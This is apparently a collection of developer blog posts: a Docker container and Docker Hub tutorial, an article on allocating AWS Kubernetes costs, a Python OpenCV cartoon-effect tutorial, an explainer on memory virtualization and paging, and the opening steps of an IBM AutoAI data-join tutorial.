  console.log(`IP is ${ip}`);
});
```
You can use the [docker inspect command](https://docs.docker.com/engine/reference/commandline/inspect/) as well.
Test the IP with **$curl http://172.17.0.2:3000/** or verify it with your browser.
If you can see this message, you know that you can actually develop web apps on your local machine with Docker.
```console
Hello, World!
```
</details>
<br />
## 5. How to modify the network ports of docker images
In the previous part, we had to find the network port for the web framework to visit it. Alternatively, [you can start with your custom port](https://www.google.com/search?&q=how+to+assign+port+for+docker+container).
```console
$docker run -it --name ubuntu_node -p 80:80 ubuntu
```
You can also use it with **-d** to [make the container run in the background](https://docs.docker.com/engine/reference/run/).
```console
docker run -d --name ubuntu_node -p 80:80 ubuntu:latest
```
Refer to this quote to better understand what happens here:
> By default, the port on the host (container) is mapped to 0.0.0.0, which means all IP addresses. You can specify a particular IP when defining the port mapping, for example, -p 127.0.0.1:80:80
<br />
## 6. Docker Images and Containers
You may find yourself confused by the difference between Docker container and image. Just think of the images as classes and containers as instances that you are using on your machine. You can:
1. Pull or run (pull and start) images and it will make docker containers from them on your local machine.
2. Edit files in your containers with **$docker exec -it containername bash**.
3. Make images from the containers with **$docker commit containername youraccount/image && docker push youraccount/image**.
Feel free to start with Dockerfile instead of **1.** and **2.** and commit your docker images as well. We'll learn that in another [Steadylearner Blog] with [Elastic Beanstalk].
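The class/instance analogy above can be made concrete with a tiny Python sketch (purely illustrative — the class name is made up):

```python
class UbuntuNodeImage:
    """A Docker image is like a class: a blueprint (filesystem layers, default command)."""

# Containers are like instances: many can run from one image, each with its own state.
container_a = UbuntuNodeImage()
container_b = UbuntuNodeImage()

print(container_a is container_b)  # False: separate instances of the same blueprint
```

Committing a container back to an image is then roughly like turning a modified instance into a new class to instantiate later.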
<br />
## 7. How to upload your Docker images to Docker Hub
Now, we are going to [create a repository at Docker Hub](https://cloud.docker.com/repository/create) and upload the example we made.
First, login with this command:
```console
$docker login
```
Then, use [$docker commit](https://www.scalyr.com/blog/create-docker-image).
```console
$docker commit ubuntu_node
```
Next, verify the image made from the ubuntu_node container using this:
```console
$docker images
```
Give it a tag (name).
```console
$docker tag imageid steadylearner/ubuntu_node
```
You can execute this command instead:
```console
$docker commit ubuntu_node steadylearner/ubuntu_node
```
Now, you can push your docker image to Docker Hub with this:
```console
$docker push steadylearner/ubuntu_node // yourusername/image
```
Wait for the upload to complete and use this:
```console
$docker run -it steadylearner/ubuntu_node bash
```
If you want to edit it, just follow the same steps we used before.
Restart the containers with this, if they stop:
```console
$docker restart containerid
$docker exec -it containerid bash
```
To remove the container made from the steadylearner/ubuntu_node image (or yours), you can use this:
```console
$docker stop ubuntu_node
$docker container rm ubuntu_node
$docker image rm ubuntu
```
If you want to rename the container, use this:
```console
$docker container rename randomname ubuntu_node
```
Use yours instead of ubuntu_node or steadylearner/ubuntu_node.
If you modify the project, use commands similar to this:
```console
$docker commit ubuntu_node steadylearner/ubuntu_node
```
Or with a commit message.
```console
$docker commit --message "Test message and will be similar to github -m option" ubuntu_node steadylearner/ubuntu_node
```
Now, let's push the image made from it to Docker Hub:
```console
$docker push steadylearner/ubuntu_node
```
and use this:
```console
$docker run -it steadylearner/ubuntu_node bash
```
or this, to verify the result:
```console
$docker history steadylearner/ubuntu_node
```
<br />
## 8. Conclusion
I hope you made it all work. We learned how to install Docker and make it work with Nginx, how to make a Docker container and image and upload them into [Docker Hub].
There are many things to learn. But everything will be easier with examples. In the later posts on the [Steadylearner Blog], we will learn how to deploy the web app with [Elastic Beanstalk] from [AWS] and a Dockerfile. We will also learn how to deploy microservices with [ECS], [CloudFormation], **docker-compose.yml**, etc. So, keep an eye out for updates!
Stay on top of the latest Steadylearner content: follow me on [Twitter].
[If you need to hire a developer, you can contact me.](https://t.me/steadylearner)
**Thank you! Share this post with others and help us to grow and improve.**
Reviewed by [Mariana Santos](https://www.linkedin.com/in/mariana-santos-89234a189/?locale=en_US)
Refer to these commands if you want more. Use the ID or the name of the containers for them.
### Logs of the container
```console
$docker logs containerid | name
```
### History of the image
```console
$docker history steadylearner/ubuntu_node
```
### Remove unused images
```console
$docker images
$docker image rm dockerimagename
$docker rmi dockerimagename
```
### Rename the container
```console
$docker rename randomname whatyouwant
```
### Pause and unpause the containers
```console
$docker pause containerid | name
$docker ps -a
$docker unpause containerid | name
$docker ps -a
```
### Start and stop them
```console
$docker stop containerid | name
$docker ps -a
$docker start containerid | name
$docker ps -a
```
### Remove containers
```console
$docker container rm containerid | name
```
— steadylearner
# Keep your AWS Kubernetes costs in check with intelligent allocation

*Published 2021-05-18 · https://cast.ai/blog/keep-your-aws-kubernetes-costs-in-check-with-intelligent-allocation/ · Tags: kubernetes, devops, aws, eks*

Traditional cost allocation and Kubernetes are like oil and water. Surely, containerized environments make a lot of things easier. But not this one.
Luckily, there are a few things you can do to **allocate AWS Kubernetes costs smarter** and keep them in check.
Read on to find out what they are and finally hold the reins over your cloud expenses.
**What you’ll find inside:**
* **You’re not the only one getting confused by Kubernetes costs, here’s why**
1. Calculating shared costs is a nightmare
2. Containers are very dynamic
3. Dealing with multiple cost centers is hard
4. Autoscaling leads to more confusion
* **Allocating AWS Kubernetes costs, the smart way**
1. Use container classes
2. Break costs down for labeling and tagging
3. Establish labeling and namespace standards
4. Split and allocate shared costs
5. Count in cluster costs beyond the core
* **How to apply all of this and win the cost allocation game**
## You’re not the only one getting confused by Kubernetes costs, here’s why

Getting the hang of [Kubernetes cost estimation](https://cast.ai/blog/kubernetes-cost-estimation-4-problems-and-how-to-solve-them/), allocation, and reporting is something every team mindful of its expenses aspires to.
But why is it so hard? Here are 4 Kubernetes cost challenges we all know all too well.
### 1. Calculating shared costs is a nightmare
Kubernetes clusters are in essence shared services multiple teams run to hold multiple containers and apps. Once a team deploys a container, it uses some of the cluster’s resources – so, you need to pay for each and every server instance that is part of your cluster.
> This doesn’t sound so hard until you try making that work with, say, three teams working on ten unique applications.
Which application or project uses the biggest chunk of your cluster resources? You can’t really tell, because all of these projects use multiple containers.
Knowing how many resources an individual container uses from a specific server is next to impossible. And that’s what makes allocating Kubernetes costs so challenging.
### 2. Containers are very dynamic
A container’s lifespan lasts on average only [one day](https://www.datadoghq.com/container-report/). Compare that to how long your virtual machine lasts. It’s a speck in time.
The dynamic character of your containerized environment makes calculating costs even more complex. You need to come up with a cost management system that can handle it.
### 3. Dealing with multiple cost centers is hard
It’s likely that not all development costs come from the DevOps budget and you have a number of cost centers running across your company.
While your product team develops core applications, **another team might launch a shadow IT project that consumes resources.** You need to consider this especially if your business has multiple digital services and each comes with its own teams and budgets.
When multiple teams use one cluster, identifying which one is responsible for which part of the bill is a hard nut to crack.
### 4. Autoscaling leads to more confusion
Teams often use the three built-in [Kubernetes autoscaling](https://cast.ai/blog/guide-to-kubernetes-autoscaling-for-cloud-cost-optimization/) mechanisms that reduce the waste (and cost) of running clusters. But autoscaling has an impact on your cost calculations.
For example, **Vertical Pod Autoscaler (VPA)** automatically adjusts requests and limits configuration to eliminate overhead. It changes the number of requests on a container, increasing and reducing its resource allocation.
**Horizontal Pod Autoscaler (HPA)** focuses on scaling out to get the best combo of CPU or RAM allocated to an instance. It changes the number of containers all the time.
#### Why does it matter? Here’s an example scenario:
* Imagine that you have three webserver containers running during the night. Everything works well.
* But there are some peak hours during the day – so HPA scales from 3 to 50 containers.
* When lunchtime comes and demand is lower, it scales down.
* And then it brings the scale back up for the afternoon rush, only to settle at a low level as the day ends.
The number of containers and their sizes is very dynamic in this setup. This complicates the process of calculating and forecasting AWS Kubernetes costs even more.
## Allocating AWS Kubernetes costs, the smart way

Take a look at your [cloud bill](https://cast.ai/blog/cloud-bill-5-common-issues-and-how-to-deal-with-them/). You get charged for every instance that makes up a cluster where containers are deployed. You need to pay for that resource, even if you’re not using it.
> To allocate the individual costs of a container running on a given cluster, you need to discover how much of the server the container ended up consuming.
And then add the satellite AWS Kubernetes costs of a running cluster to that as well (from management nodes and software licensing to backups and disaster recovery).
How to do it? Here are some best practices for allocating Kubernetes costs.
### 1. Use container classes
You can set different resource guarantees on scheduled containers in Kubernetes. They’re called Quality of Service (QoS) classes. Here’s a quick introduction:
**Guaranteed**
These pods are top priority and guaranteed to not get killed until the moment they exceed their limits. If limits and requests (not equal to 0) are set for all the resources across your containers and are equal, the pod is classified as guaranteed.
Use this for critical service containers to make sure that a pod gets the vCPU and memory it needs at all times.
**Burstable**
If your workload experiences spikes, it should have access to more resources when it needs them. This setup allows the pod to use more resources than requested at first – as long as the capacity is available on the underlying instance.
This type of allocation works like burstable instances AWS offers (T-series) – they give you a base level of performance and allow the pod to burst when it requires more.
This is much more cost-effective than investing in an instance large enough to cover the spikes but way too large for regular operation.
**BestEffort**
These pods are the lowest priority and get killed first if your system runs out of memory. This allocation allows the pod to run while there’s excess capacity available and stops it when it’s not. It works like spot instances in AWS.
> It’s a good idea to allocate a mix of pods that have different resource allocation guarantees into a server instance to increase its utilization.
For example, you can allocate a baseline of resources to guaranteed resource pods, add some burstable pods that use up to the remainder of resources, and best-effort pods that take advantage of any spare capacity.
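The three QoS classes above can be sketched as a simplified classifier. This is illustrative Python, not the real Kubernetes logic — actual QoS classification is done per pod, across all containers and all resources — but it captures the rule of thumb:

```python
def qos_class(resources):
    """Rough sketch of QoS classification for a single container's resources dict."""
    requests = resources.get("requests")
    limits = resources.get("limits")
    if requests and limits and requests == limits:
        return "Guaranteed"   # requests set and equal to limits
    if requests or limits:
        return "Burstable"    # something set, but not all equal
    return "BestEffort"       # nothing set: first to be killed under pressure

print(qos_class({"requests": {"cpu": "500m", "memory": "256Mi"},
                 "limits":   {"cpu": "500m", "memory": "256Mi"}}))  # Guaranteed
```

A container with only requests set would come out as Burstable, and one with neither requests nor limits as BestEffort.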

### 2. Break costs down for labeling and tagging
Breaking costs into separate categories helps to make sense of them through labels and tagging. Here are a few categories that Kubernetes teams find useful:
* **Billing hierarchy** – develop and align it with your cloud costs (for example, projects, folders, or organizations),
* **Resources** – this part covers compute cores, GPU, TPU, RAM, load balancers, custom machines, network egress, etc.
* **Namespaces** – it’s a good practice to label specific and isolated containers,
* **Labels** – come up with labels reflecting different cost centers, teams, application names, environments, etc.
### 3. Establish labeling and namespace standards
Develop and implement a labeling and namespace strategy – and stick to it when allocating cluster costs. That way, teams that use AWS can see which groups are driving costs in a given cluster.
Consider the proportional resources consumed by every group and use your findings to allocate cluster costs to these groups.
**Here’s an example:**
Let’s say that you have four namespaces in a cluster. Each of them consumes 25% of the cluster resources. One way to allocate costs would be taking 25% of the total cluster costs and allocating them to each namespace.
Naturally, this is an example scenario – don’t expect things to be so straightforward in the real world.
> Before setting out to do that, establish how you’ll be determining cluster resource utilization – by CPU, memory, or a combination of these two? Are you going to look at requests or actual consumption?
* **If you go for actual usage,** each team will only pay for what it uses. But who will be covering the bill for idle time? How are you going to deal with overprovisioning?
* **If you allocate costs by resource requests,** you’ll encourage teams to provision only what they need and allocate all the costs. But this might also lead teams to underestimate their requirements.
### 4. Split and allocate shared costs
Companies have unique ways to split infrastructure costs. These methods often get inherited when they start using Kubernetes.
Here’s a set of best practices if you’re looking for another approach:
#### a. Define what shared costs are
This depends on the maturity and size of your company. You share the cloud bill at the organizational level but need to allocate it either to a centralized budget or different cost centers. Still, your shared costs will be charged within one account, so understanding which AWS Kubernetes costs should be shared is challenging.
**Here are a few examples of commonly shared costs:**
* Shared resources (network, storage like data lakes)
* Platform services (Kubernetes, logging)
* Enterprise-level support and discounts
* Licensing and third-party costs
> Take support charges as an example. They’re applied at the parent account level. While some businesses cover them with a central budget of the IT or cloud team, others go a step further and allocate this cost to customers like application owners or business units.
The rise of shared platforms where multiple teams use the same core resources complicates this – like Kubernetes systems that run on shared clusters.
#### b. Split your shared costs
Tagging helps to do that accurately, and you can choose from several techniques:
* Proportional split – based on the relative percentage of direct costs
* Even split – where you split the total amount evenly across all targets
* Fixed proportion split – based on a user-defined coefficient
This is a bit abstract, so let’s show an example.
Imagine that you have several business units that consume a different portion of cloud resources:

You get a $15k enterprise support charge on top of that, so your final bill is $115k per month.
Here’s how this plays out in different splitting techniques.
#### Proportional split
In this model, you split the $15k enterprise support charge among your three business units based on the percentage of their spend in direct charges. So, the sales operations team that uses 50% of your bill will also be accountable for $7.5k on top of their bill.

#### Even split
This model is simpler, so you can often find it among smaller companies with fewer business units. In this scenario, the $15k enterprise support charge is shared evenly by all business units – so $5k each.

#### Fixed proportion split
When using this method, you set a fixed percentage for attributing shared costs based on past spend. The idea is to get a fair breakdown. So if you decide that the sales operations team’s shared cost allocation is 40%, then it will get $6k of the enterprise support fee allocated to it.

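The three splitting techniques can be sketched in a few lines of Python. Only the $15k support fee, the roughly $100k of direct charges, the sales operations team's 50% share, and its 40% fixed coefficient come from the text; the other unit names, amounts, and coefficients are made up for illustration:

```python
direct = {"sales_ops": 50_000, "unit_b": 30_000, "unit_c": 20_000}  # hypothetical direct charges
shared = 15_000                                                     # enterprise support fee
total = sum(direct.values())                                        # 100_000

# Proportional split: share of the fee follows share of direct spend
proportional = {u: shared * cost / total for u, cost in direct.items()}

# Even split: every unit pays the same slice
even = {u: shared / len(direct) for u in direct}

# Fixed proportion split: user-defined coefficients based on past spend
coefficients = {"sales_ops": 0.40, "unit_b": 0.35, "unit_c": 0.25}
fixed = {u: shared * c for u, c in coefficients.items()}

print(proportional["sales_ops"], even["sales_ops"], fixed["sales_ops"])
# 7500.0 5000.0 6000.0
```

The printed numbers match the article's examples: $7.5k proportional, $5k even, and $6k at a 40% fixed coefficient.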
### 5. Count in cluster costs beyond the core

When allocating costs to cluster consumers, consider the satellite costs of operating this cluster like:
* **Management and operational costs** – these are charged by AWS for managing the cluster for you. For example, EKS charges $0.1 per hour per Kubernetes cluster – this amounts to c. $74 per month.
**_Learn more here: [AWS EKS vs. ECS vs. Fargate: Where to manage your Kubernetes?](https://cast.ai/blog/aws-eks-vs-ecs-vs-fargate-where-to-manage-your-kubernetes/)_**
* **Storage** – add the costs of storage consumed by the host OS on the nodes, and any backup or data retrieval storage that is used in operating a production cluster can be allocated back to the workloads running on the cluster.
* **Licensing** – these costs might be included in your AWS bill, but if you use Bring Your Own License (BYOL), you need to allocate this cost from the external spend. Moreover, software packages running on the host OS might incur a license fee too.
* **Observability** – these metrics and logs are transferred from the cluster to a service your teams use to monitor and visualize them. This cost might be incurred by AWS or a third-party SaaS solution.
* **Security** – AWS offers a wealth of security features, but they come at an extra fee that needs to be allocated.
## How to apply all of this and win the cost allocation game
Implementing all of these best practices at once is bound to overwhelm you. So start small and develop a process for allocating costs. Build an understanding of how these costs should be allocated in your company.
Or get a solution that keeps your AWS Kubernetes costs at bay. Analyzing and allocating costs is so much easier if you have access to a detailed overview like this:

**Here’s how to get started:** [Analyze your cluster for free](https://cast.ai/eks-optimizer/) to see every single detail that increases your AWS bill.

— castai
# How to cartoonize an image with Python

*Published 2021-05-22 · https://dev.to/stokry/how-to-cartoonize-an-image-with-python-1e01 · Tags: python, tutorial, showdev, computervision*

In this tutorial, I will show you how to give a cartoon effect to an image in Python with OpenCV.
OpenCV is an open-source python library used for computer vision and machine learning. It is mainly aimed at real-time computer vision and image processing. It is used to perform different operations on images which transform them using different techniques.
Many apps can turn your photos into cartoons, but you can do this on your own with few lines of code Python code.
This is our test image:

Let's jump to the code.
```python
import numpy as np
import cv2
```
After that, we set the filename of our image:
```python
filename = 'elon.jpeg'
```
Then we will define our `resizeImage` function:
```python
def resizeImage(image):
    scale_ratio = 0.3
    width = int(image.shape[1] * scale_ratio)
    height = int(image.shape[0] * scale_ratio)
    new_dimensions = (width, height)
    resized = cv2.resize(image, new_dimensions, interpolation = cv2.INTER_AREA)
    return resized
```
Then we need to find the contours:
```python
def findCountours(image):
    contoured_image = image
    gray = cv2.cvtColor(contoured_image, cv2.COLOR_BGR2GRAY)
    edged = cv2.Canny(gray, 30, 100)
    contours, hierarchy = cv2.findContours(edged,
        cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
    cv2.drawContours(contoured_image, contours, contourIdx=-1, color=1, thickness=1)
    cv2.imshow('Image after contouring', contoured_image)
    cv2.waitKey(0)
    cv2.destroyAllWindows()
    return contoured_image
```
After that, we do color quantization:
```python
def ColorQuantization(image, K=4):
    Z = image.reshape((-1, 3))
```
Then we convert the image data to numpy float32:
```python
    Z = np.float32(Z)
```
Also, we need to define the criteria and apply kmeans:
```python
    criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10000, 0.0001)
    compactness, label, center = cv2.kmeans(Z, K, None, criteria, 1, cv2.KMEANS_RANDOM_CENTERS)
```
Then we convert back to `uint8` and apply the result to the original image:
```python
    center = np.uint8(center)
    res = center[label.flatten()]
    res2 = res.reshape((image.shape))
    return res2
```
```python
if __name__ == "__main__":
    image = cv2.imread(filename)
    resized_image = resizeImage(image)
    coloured = ColorQuantization(resized_image)
    contoured = findCountours(coloured)
    final_image = contoured
    save_q = input("Save the image? [y]/[n] ")
    if save_q == "y":
        cv2.imwrite("cartoonized_" + filename, final_image)
        print("Image saved!")
This is our final result:

Thank you all.
— stokry
# Virtualizing Memory

*Published 2021-05-24 · https://www.thesystemsprogrammer.com/posts/virtualizing-memory · Tags: computerscience, firstyearincode, systems, linux*

In the last article, we asked ourselves how the operating system gives each process the illusion that it has its own address space despite only having one hardware RAM. This is one of the most important and most complicated virtualization techniques that the operating system performs. Because of that we will discuss memory virtualization in three separate articles. The goals of the operating system with respect to memory are as follows:
- Give processes a contiguous address space
- Give processes memory isolation from each other
- Do both of the above efficiently with respect to memory usage and processing speed
Let’s first talk about what memory is. Memory can be thought of as a series of slots. 32-bit memory has 32-bit slots and 64-bit memory has 64-bit slots. The size of a computer’s memory can be quite large. For example, on my Mac, the size of the memory is 8 gigabytes. Each memory slot (more commonly referred to as address), is numbered. Memory 8 gigabytes large with 64-bit slots is numbered 0 to 8,000,000,000 each at intervals of 8 bytes (64-bits).
Diving a bit deeper, what does a specific process’s memory address space look like? There are a couple of important sections in a program’s memory: the stack, the heap, the code, and the data. At the bottom is the text segment; this is where the code lives. Above that is the data segment; variables that are global or static live here. Above that is the heap segment. This is where data allocated at runtime, using the *malloc* call in C for example, is located. The heap grows upwards: memory is allocated at the bottom first and grows toward the top. Conversely, the stack is above the heap and grows downward. The stack area is used for local variables that exist only for the duration of their scope and are automatically freed when the scope is exited.

## Contiguous Address Space
It’s important for a process to have the illusion that it has a contiguous address space. If it doesn’t, then pointer arithmetic cannot happen and we wouldn’t be able to allocate memory larger than a word at a time. A programmer needs a consistent view of memory to be able to write code that performs deterministically. For example, the program needs to know that the calling function’s stack is above the callee function’s stack. Otherwise, when exiting the scope of a function, the programming language wouldn’t know where to go to find the next instruction.
One way to give programs a contiguous address space is by dividing up the computer’s total available memory (or RAM - random access memory) into a fixed number and giving each process one of these chunks.

The obvious downside of this approach is that we may only be able to have a fixed number of processes running at a particular time. For example, if I divided up my computer’s 8 gigabytes of RAM into 1 gigabyte per process, then I would only be able to have 8 processes running simultaneously. The 9th process wouldn’t have a chunk of memory readily available to it! Additionally, there will be a large amount of wasted memory since all these 8 processes would likely not use up the entire address space.
How can we minimize the amount of unused memory and make it so that any process can access a free memory address? One way to do this is to add a layer of indirection that gives each process the illusion that it has a contiguous address space while it may be fragmented in the physical address space. This layer of indirection would be a translation table. The operating system could have a table that translates address spaces as viewed by the process to address spaces as viewed by the actual hardware. Every time the process reads or writes to memory, it needs to ask the operating system to look at the translation table to determine what physical address space corresponds to the virtual address space the process is reading or writing from.
One huge downside of this approach is that every memory access has to go through the operating system! Since most programs out there need to access memory frequently, having the operating system maintain this data structure and check it on every memory access would take up a lot of CPU cycles. How can we make this lookup faster? One way to make it faster is by having this translation table live in hardware and have the hardware do the translation instead of the operating system doing it. This would be much faster!
A common implementation of this is to have a translation lookaside buffer (TLB) in hardware. The TLB will map virtual addresses to physical addresses and is updated by the operating system. When the hardware looks up a virtual address in the TLB, if the translation doesn’t exist, the hardware executes a handler in the operating system. The operating system will fill the TLB with the correct address and the instruction will re-execute. Now, the user process does not need to request an address translation from the operating system everytime it reads or writes to memory. Instead, the hardware does the memory address translation under the hood.
Let’s see how this might work in practice. Let’s say a user process wants to allocate some memory at address 0x00. The CPU attempts to access the address 0x00 by first looking for a translation in the TLB. Because this is the first time the program is attempting to access 0x00, it doesn’t find any entry for 0x00 in the TLB and it jumps to execute instructions in the operating system. The operating system then checks to see if the process can still allocate memory (it is not at its memory limit). If it does, then it finds a memory address that is unused by any other processes. To do this, the operating system needs a mapping of memory addresses to whether it is available or not. Once the operating system finds an available physical address, lets say 0x10, it fills the TLB with the virtual address to physical address mapping 0x00 -> 0x10. Then, it will resume the execution of the CPU instruction. The next time the CPU wants to read the data at virtual address 0x00, the CPU looks it up in the TLB and finds the physical address is 0x10 and is able to pull the value correctly.
To make all this possible, the operating system needs a data structure for the mapping of virtual memory addresses to its physical memory address. Wait a minute...this means that for every memory address, we need another memory address to tell us what physical address a virtual address maps to (if it does at all). Woah, this means that we lose half the memory addresses available to us.
Is there a way we can use memory a little bit more efficiently so we don’t lose half of it to operating system accounting overhead? Yes, there is actually! What if instead of a one-to-one mapping of physical address space to whether it is free or not, we map things in larger chunks. For example, if we have a chunk size of 256 addresses, then we would have one entry in memory representing whether addresses 0 - 255 are free, another entry representing if addresses 256 - 511 are free, etc… What is the space complexity of this scheme? Instead of having to reserve half our memory for a virtual address to physical address mapping, we spend 1/256 the amount of memory on it. This is a huge win and the chunk size parameter can be tuned! I call this a chunk but it is more commonly referred to as a page and the technique referred to as paging. Let’s see an example of how all this works.
Let’s say that our program wants to access memory address 0x0110 (address 272 in decimal). If our page size is 256, then the TLB will use the low 8 bits (the last two hex digits) as an offset into the page, and the remaining bits to find the virtual to physical page mapping.

The TLB will first identify the offset which is 16 in decimal (0x10). Next, it will identify the remaining bits used to find the virtual to physical page mapping. The remaining bits are 0x01 in hex which corresponds to the virtual to physical page table mapping at index 1.
The TLB will take the physical page frame and append the offset to generate the physical memory address that the program will find the data the CPU is requesting.
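Using the numbers from this walkthrough, the page/offset split can be sketched in Python. The physical frame value 0x07 is a made-up example, since the original figure isn't reproduced here:

```python
PAGE_SIZE = 256     # addresses per page
OFFSET_BITS = 8     # log2(256): the low 8 bits (two hex digits) are the offset

page_table = {0x01: 0x07}   # virtual page 0x01 -> physical frame 0x07 (hypothetical)

def translate(virtual_addr):
    page = virtual_addr >> OFFSET_BITS        # 0x0110 -> virtual page 0x01
    offset = virtual_addr & (PAGE_SIZE - 1)   # 0x0110 -> offset 0x10 (16 in decimal)
    frame = page_table[page]                  # a missing entry would be a page fault
    return (frame << OFFSET_BITS) | offset    # physical frame with the offset appended

print(hex(translate(0x0110)))  # 0x710
```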
Great, we now have an efficient way of giving processes the illusion that it has a contiguous address space and access exclusive access to physical hardware when it really doesn’t! The next thing we need to worry about is memory isolation between processes.
## Memory Isolation
What’s stopping a malicious process (or a buggy process) from accessing an area of memory that it isn’t allocated? Easy! We can re-use the address translation mechanism for creating a contiguous address space. In the TLB, we can include data about the active process. If the active process running an instruction doesn’t match the TLB entry, then the CPU will trap and execute a SEGFAULT signal handler into the operating system.
## Demand Paging
So...are we done? Is that what all modern operating systems do? Nope, one more question! Our computers are not limited to a fixed number of processes, so how do they run more processes than physical memory can hold while still providing memory isolation between them? The answer to this is demand paging. Demand paging was invented during the multi-programming era of operating systems, pioneered by the Atlas operating system. The trick is: we can write the memory pages of a process that isn’t running out to disk. When that process requests the memory again, the operating system swaps it from disk back into memory. We’re effectively swapping these pages out to disk when they aren’t needed and bringing them back when they are. We are now able to run many processes on the operating system without worrying about a fixed allotment of physical pages.
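A toy model of that swapping behavior (the frame count, eviction policy, and page contents are all invented for illustration; real kernels are far more sophisticated):

```python
from collections import OrderedDict

NUM_FRAMES = 2            # pretend physical memory holds only two pages
resident = OrderedDict()  # pages currently in memory, least recently used first
disk = {}                 # pages that have been swapped out

def access(page):
    if page in resident:             # already in memory: no fault
        resident.move_to_end(page)
        return resident[page]
    if len(resident) >= NUM_FRAMES:  # page fault with memory full: evict one
        victim, contents = resident.popitem(last=False)
        disk[victim] = contents      # swap the victim out to disk
    resident[page] = disk.pop(page, f"data-{page}")  # swap in (or first touch)
    return resident[page]

for p in [0, 1, 2, 0]:  # touching page 2 evicts 0; touching 0 again swaps it back
    access(p)
print(sorted(resident), sorted(disk))  # pages 0 and 2 resident, page 1 on disk
```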
## Conclusion
These are the general principles behind how physical memory is virtualized by the operating system. If there is something you are curious to learn more about, feel free to reach out to me on Twitter or via email.
| thesystemsprogrammer |
708,255 | Think Lab 2124 : Build & Deploy AI/ML Models w Multiple Datasets w AutoAI - Tutorial B | Welcome to Tutorial Tuesday! We'll pick up where we left off last week with our Think Lab... | 0 | 2021-05-25T20:08:36 | https://dev.to/ibmdeveloper/think-lab-2124-build-deploy-ai-ml-models-w-multiple-datasets-w-autoai-tutorial-b-167 | #Welcome to Tutorial Tuesday!
We'll pick up where we left off last week with our Think Lab 2124 [Tutorial A: Build & Deploy a Data Join Experiment](https://dev.to/ibmdeveloper/think-lab-2124-build-deploy-ai-ml-models-w-multiple-datasets-w-autoai-part-a-24pk)!
##AutoAI Overview
AutoAI in Cloud Pak for Data automates the ETL (Extract, Transform, and Load) and feature engineering process for relational data, saving data scientists months of manual data prep time and achieving results comparable to those of top-performing data scientists.
The AutoAI graphical tool in Watson Studio automatically analyzes your data and generates candidate model pipelines customized for your predictive modeling problem. These model pipelines are created iteratively as AutoAI analyzes your dataset and discovers data transformations, algorithms, and parameter settings that work best for your problem setting. Results are displayed on a leaderboard, showing the automatically generated model pipelines ranked according to your problem optimization objective.
Collect your input data in a CSV file or files. Where possible, AutoAI will transform the data and impute missing values.
**Notes:**
* Your data source must contain a minimum of 100 records (rows).
* You can use the IBM Watson Studio Data Refinery tool to prepare and shape your data.
* Data can be a file added as connected data from a networked file system (NFS). Follow the instructions for adding a data connection of the type Mounted Volume. Choose the CSV file to add to the project so you can select it for training data.
##AutoAI Process
Using AutoAI, you can build and deploy a machine learning model with sophisticated training features and no coding. The tool does most of the work for you.
AutoAI automatically runs the following tasks to build and evaluate candidate model pipelines:
* Data pre-processing
* Automated model selection
* Automated feature engineering
* Hyperparameter optimization
In this Think Lab, you will see how to join several data sources and then build an AutoAI experiment from the joined data. The scenario we’ll explore in Part B of the Lab is for a mobile company that wants to understand the key factors that have an impact on user experience in their call center. You will use IBM AutoAI to automate data analysis for a dataset collected from a fictional call center. The objective of the analysis is to gain more insight on factors that impact customer experience so that the company can improve customer service. The data consists of historical information about customer interaction with call agents, call type, customer wireless plans and call type resolution.
##Project Requirements
[IBM Cloud (Free) Lite Tier Account](https://ibm.biz/think-2021)
##Project Setup Steps
1. [Create an IBM Cloud Lite Tier Account](https://ibm.biz/think-2021)
2. Create a Watson Studio Instance
3. Provision Watson Machine Learning & Cloud Object Storage Instances
4. Create a New Project
5. Download the Call Center Dataset from the Gallery
6. Unzip the Call Center Dataset's .zip File
7. Add the Call Center Datasets to the Project
##Project Setup
[See Tutorial A for Project Setup](https://dev.to/ibmdeveloper/think-lab-2124-build-deploy-ai-ml-models-w-multiple-datasets-w-autoai-part-a-24pk)
##Think Lab Overview
In Tutorial B of this **Think Lab**, you will use IBM AutoAI to automate data analysis for a dataset collected from a fictional call center. The objective of the analysis is to gain more insight on factors that impact customer experience so that the company can improve customer service. The data consists of historical information about customer interaction with call agents, call type, customer wireless plans and call type resolution. Each source of information is kept in a separate table (a CSV file).
Using the data join capabilities of AutoAI, you will connect the tables using common columns, or keys, to create a single data source, without needing to write SQL-like queries. Additionally, AutoAI will do some automated data preparation, or feature engineering, on the combined data before using the data to train the model.
##About the Data

The data is divided as follows:
* **User_experience**: User experience reflects the satisfactory feedback from customers to each call agent daily.
* **Call_log**: Records historical information about the calls from customers to the call center in the last 3 years.
* **Call_Type**: Records call type information.
* **Wireless_Plans**: Records the kind of wireless plans customers are subscribed to.
* **Call_Resolution_Type**: Records type of call resolution.
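The joins you will build connect these tables on shared key columns, keeping every row of the main source. A minimal Python sketch of that left-join behavior (the rows and values are invented for illustration; AutoAI performs this on the real CSVs for you):

```python
# Main source: one row per agent per day, with the prediction target
user_experience = [
    {"Agent_ID": 1, "Call_Date": "2021-01-04", "User_Experience": "Good"},
    {"Agent_ID": 2, "Call_Date": "2021-01-04", "User_Experience": "Poor"},
]
# Secondary table joined on the suggested keys Agent_ID and Call_Date
call_log = [
    {"Agent_ID": 1, "Call_Date": "2021-01-04", "Talk_Time": 310},
]

def left_join(left, right, keys):
    joined = []
    for row in left:
        matches = [r for r in right if all(r[k] == row[k] for k in keys)]
        for match in matches or [{}]:  # keep the left row even with no match
            joined.append({**row, **match})
    return joined

result = left_join(user_experience, call_log, ["Agent_ID", "Call_Date"])
print(len(result))  # both left rows survive; only the first gains Talk_Time
```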
##Steps Overview
This tutorial presents the basic steps for joining data sets then training a machine learning model using AutoAI:
* Add and join the data
* Train the experiment
* Deploy the trained model
* Test the deployed model
##Think Lab - Tutorial B Steps
1. Create a New AutoAI Experiment
2. Build the Data Join Schema
3. Run the AutoAI Experiment
4. Explore the Holdout & Training Data Insights
5. Deploy the Trained Model
6. Score the Model
7. View the Prediction Results
##Think Lab - Tutorial B: AutoAI Data Join Multi-Classification
###1. Create a New AutoAI Experiment
####Add a New AutoAI Experiment to the Project
Click **Add to Project (+)**

Select **AutoAI experiment**

####Associate a Machine Learning Service Instance
Select a Watson Machine Learning Service Instance from the dropdown menu. Click **Create**

####Add the Call Center Datasets
Click **Select from project**

Select the call center data assets. Click **Select 5 Assets**

**Optional**: You can view metrics on each data source by clicking on it in the Data Source window.

###2. Build the Data Join Schema
The main source contains the prediction target for the experiment. Select **User_experience.csv** as the main source, then click **Configure join**.

In the data join canvas you will create a left join that connects all of the data sources to the main source.
